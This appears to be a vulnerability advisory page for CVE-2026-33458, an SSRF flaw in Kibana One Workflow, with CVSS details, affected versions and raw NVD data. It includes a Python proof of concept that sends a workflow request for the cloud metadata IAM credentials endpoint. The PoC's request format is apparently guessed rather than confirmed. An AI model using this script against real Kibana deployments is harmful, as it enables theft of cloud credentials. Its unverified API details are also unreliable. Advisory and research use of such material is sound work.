Security Vulnerability Report
中文
CVE-2026-33458 CVSS 6.3 MEDIUM

CVE-2026-33458

Published: 2026-04-08 18:26:00
Last Modified: 2026-04-13 11:30:34
Source: [email protected]

Description

Server-Side Request Forgery (CWE-918) in Kibana One Workflow can lead to information disclosure. An authenticated user with workflow creation and execution privileges can bypass host allowlist restrictions in the Workflows Execution Engine, potentially exposing sensitive internal endpoints and data.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* - VULNERABLE
Kibana < 9.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-33458 # Conceptual PoC demonstrating the SSRF bypass in Kibana One Workflow import requests import json TARGET_URL = "https://<kibana-host>:<port>/api/workflows/execute" HEADERS = { "Content-Type": "application/json", "kbn-xsrf": "reporting" } AUTH = ("low_priv_user", "password") # Payload attempting to access internal metadata service payload = { "workflow": { "name": "SSRF_PoC", "steps": [ { "action": "http_request", "params": { "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "method": "GET" } } ] } } try: response = requests.post(TARGET_URL, headers=HEADERS, auth=AUTH, json=payload, verify=False) if response.status_code == 200: print("[+] Potential SSRF triggered. Response:") print(response.text) else: print(f"[-] Request failed with status {response.status_code}") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33458", "sourceIdentifier": "[email protected]", "published": "2026-04-08T18:26:00.267", "lastModified": "2026-04-13T11:30:33.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (CWE-918) in Kibana One Workflow can lead to information disclosure. An authenticated user with workflow creation and execution privileges can bypass host allowlist restrictions in the Workflows Execution Engine, potentially exposing sensitive internal endpoints and data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.0", "versionEndExcluding": "9.3.3", "matchCriteriaId": "5EE7B9F3-E587-498B-822D-785CB848F767"}]}]}], "references": [{"url": "https://discuss.elastic.co/t/kibana-9-3-3-security-update-esa-2026-28/385815", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.